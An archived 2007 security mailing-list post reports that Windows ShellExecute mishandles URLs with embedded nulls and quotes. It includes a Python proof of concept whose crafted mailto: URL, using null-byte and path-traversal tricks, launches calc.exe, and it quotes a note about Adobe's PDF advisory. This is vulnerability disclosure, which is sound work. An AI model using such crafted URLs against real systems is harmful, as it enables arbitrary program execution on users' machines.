funsec mailing list archives

Re: Adobe confirms critical vulnerability after a remarkable delay


From: rms () computerbytesman com
Date: Tue, 9 Oct 2007 14:37:03 -0400 (EDT)

Hi,

BTW, it is the ShellExecute Win32 function that is busted.  The attached
Python test program runs the Windows calculator on my system with IE7
installed.  ShellExecute should either return an error or run the default
email reader.  This security problem will affect programs that use
ShellExecute with a user supplied URL.

The problem here is Windows gets confused by an embedded null and double
quotes in a URL and does the wrong thing.

This doesn't feel like the same bug as the IE7/Firefox problem that
surfaced in July which was a problem with quoting URLs on command lines.

Richard

================================================

import win32api

# Test program from the post (needs pywin32 on Windows). The mailto: URL
# carries a percent-encoded null (%00), ".." traversal and a closing double
# quote followed by ".cmd"; on an affected system with IE7 installed,
# ShellExecute launches calc.exe instead of the default mail client.
def main():
    # ShellExecute(hwnd, operation, file, parameters, directory, show_cmd)
    win32api.ShellExecute(0, "open",
        'mailto:test%00../../../../windows/system32/calc.exe".cmd',
        "", ".", 0)

if __name__ == "__main__":
    main()

================================================
Adobe has provided information with a workaround related to a critical code
execution vulnerability reported by Mr. Petko D. Petkov (aka pdp) on 20th
Sep.

http://www.gnucitizen.org/blog/0day-pdf-pwns-windows

That was almost three weeks ago...

The following advisory title states the affected Acrobat versions:
Workaround available for vulnerability in versions 8.1 and earlier of
Adobe Reader and Acrobat
http://www.adobe.com/support/security/advisories/apsa07-04.html

Go and back up your registry and apply these changes!

Red Hat has officially informed that Linux versions are not vulnerable.

- Juha-Matti
_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.

